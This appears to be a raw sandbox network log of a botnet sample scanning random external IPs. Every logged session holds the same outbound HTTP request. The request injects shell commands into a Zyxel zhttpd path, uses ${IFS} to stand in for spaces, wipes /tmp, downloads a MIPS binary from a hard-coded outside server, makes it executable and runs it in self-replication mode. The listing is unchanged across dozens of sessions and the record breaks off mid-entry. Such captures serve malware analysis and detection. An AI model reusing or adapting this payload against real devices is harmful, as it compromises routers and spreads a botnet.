                                      Jan 14, 2024 15:50:40.147566080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2836192.168.2.1441056157.243.193.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147588015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2837192.168.2.144819882.120.200.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147635937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2838192.168.2.1436680176.222.92.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147669077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2839192.168.2.1453004157.73.220.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147718906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2840192.168.2.1442024133.166.213.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147759914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2841192.168.2.1458134211.62.32.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147785902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2842192.168.2.1457670200.11.168.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147835970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2843192.168.2.1434206159.25.203.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147880077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2844192.168.2.1456784201.59.128.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147910118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2845192.168.2.143586477.191.67.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147950888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2846192.168.2.144353698.15.215.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147994995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2847192.168.2.1453190148.180.54.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148046017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2848192.168.2.144126494.150.107.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148070097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2849192.168.2.1439286126.240.223.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148107052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2850192.168.2.1437670158.39.188.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148147106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2851192.168.2.144742038.11.210.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148183107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2852192.168.2.1436414178.160.20.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148219109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2853192.168.2.1434684186.117.228.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148267984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2854192.168.2.1457894206.66.137.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148286104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2855192.168.2.1458416190.126.142.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148327112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2856192.168.2.143604862.182.184.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148389101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2857192.168.2.1448548213.35.56.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148400068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2858192.168.2.144441883.226.56.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148463964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2859192.168.2.1460064202.72.184.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148500919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2860192.168.2.1441278147.63.175.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148534060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2861192.168.2.143924873.110.244.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148569107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2862192.168.2.1451834200.94.144.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148603916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2863192.168.2.145131054.63.243.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148655891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2864192.168.2.1456518161.52.67.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148691893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2865192.168.2.1437222110.220.65.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148741961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2866192.168.2.144088897.96.191.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148775101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2867192.168.2.1446662100.39.166.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148825884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2868192.168.2.144070820.227.152.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148852110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2869192.168.2.1448318166.203.1.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.148907900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2870192.168.2.145465892.116.49.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.149162054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2871192.168.2.1446080102.188.131.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152407885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2872192.168.2.1455774150.55.225.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152422905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2873192.168.2.143872214.102.59.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152477026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2874192.168.2.1458878108.233.246.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152513027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2875192.168.2.1458976223.136.201.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152554035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2876192.168.2.1449600150.237.122.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152591944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2877192.168.2.145582277.187.185.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152626038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2878192.168.2.1458466173.154.173.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.152657032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2879192.168.2.144322490.145.230.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.164614916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2880192.168.2.145520852.121.59.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.164670944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2881192.168.2.1451732152.50.63.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.164738894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2882192.168.2.1451032142.100.10.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.164807081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2883192.168.2.145405442.90.190.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.164865971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2884192.168.2.145186247.167.167.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.164946079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2885192.168.2.1455222147.188.123.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.164975882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2886192.168.2.1449774200.167.251.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165060997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2887192.168.2.1434216172.184.64.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165115118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2888192.168.2.1450000124.208.172.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165175915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2889192.168.2.1451218207.137.114.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165220022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2890192.168.2.144727017.71.227.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165283918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2891192.168.2.1440004112.136.16.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165344954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2892192.168.2.1445694187.97.128.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165402889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2893192.168.2.1454534181.1.122.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165437937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2894192.168.2.144463451.101.169.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165463924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2895192.168.2.145654068.68.28.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165530920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2896192.168.2.1446750189.45.206.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165549040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2897192.168.2.1458164140.88.100.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:41.165626049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2898192.168.2.143528893.140.219.144443
                                      TimestampBytes transferredDirectionData
